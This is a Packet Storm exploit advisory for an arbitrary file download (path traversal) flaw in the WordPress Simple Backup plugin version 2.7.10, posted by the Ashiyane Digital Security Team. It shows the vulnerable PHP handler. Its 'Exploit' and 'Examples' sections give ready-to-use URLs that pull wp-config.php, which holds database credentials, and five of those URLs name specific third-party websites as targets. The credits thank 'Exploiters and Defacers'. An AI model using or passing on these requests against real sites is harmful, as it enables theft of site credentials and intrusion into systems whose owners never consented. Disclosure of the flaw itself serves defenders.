what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Simple Backup Arbitrary Download

WordPress Simple Backup Arbitrary Download
Posted May 19, 2015
Authored by Ashiyane Digital Security Team

The WordPress Simple Backup plugin suffers from an arbitrary download vulnerability.

tags | advisory, arbitrary
SHA-256 | 2f1879ea63c04f1d1bdc1146437974cb35370b7761eb8ab23b2cca9b2c380294

WordPress Simple Backup Arbitrary Download

Change Mirror Download
######################
# Exploit Title : Wordpress Simple Backup Plugin Arbitrary Download
File Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# discovered by : Mahdi.Hidden
# Vendor Homepage : http://mywebsiteadvisor.com/
# Date: 2015-13-05
# Tested On : Windows - Linux
# Software Link :
https://downloads.wordpress.org/plugin/simple-backup.2.7.10.zip
# Version : 2.7.10 (Last Version)
######################
# Exploit :
#
[Site]/[Path]/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
# Vulnerable Code:
#
if(array_key_exists('download_backup_file', $_GET)){
$this->download_local_backup_file($_GET['download_backup_file']);
}
private function download_local_backup_file($filename){
$bk_dir = ABSPATH."simple-backup";
//unlink($bk_dir . $filename);
$file = "$bk_dir/$filename";
//$url =
"ftp://{$this->user}:{$this->pass}@{$this->server}/{$this->directory}/$filename";
clearstatcache();
$size = filesize($file);
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header("Content-Disposition: attachment; filename=$filename");
header("Content-Length: $size");
header('Connection: close');
//ob_clean();
ob_end_clean();
flush();
readfile($file);
die();
}
#
#
######################
# Examples:
#
#
https://daptonerecords.com/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
http://mywebsiteadvisor.com/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
http://3degreesdigital.com/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
http://travellingdijuca.com/WordPress/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
http://justinthedesigner.com/wp-admin/tools.php?page=backup_manager&download_backup_file=../wp-config.php
#
#
######################
# Special thanks to:
# ACC3SS - Milad Hacking - T3rm!nat0r5 and all of Ashiyane Exploiters
and Defacers.
######################
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close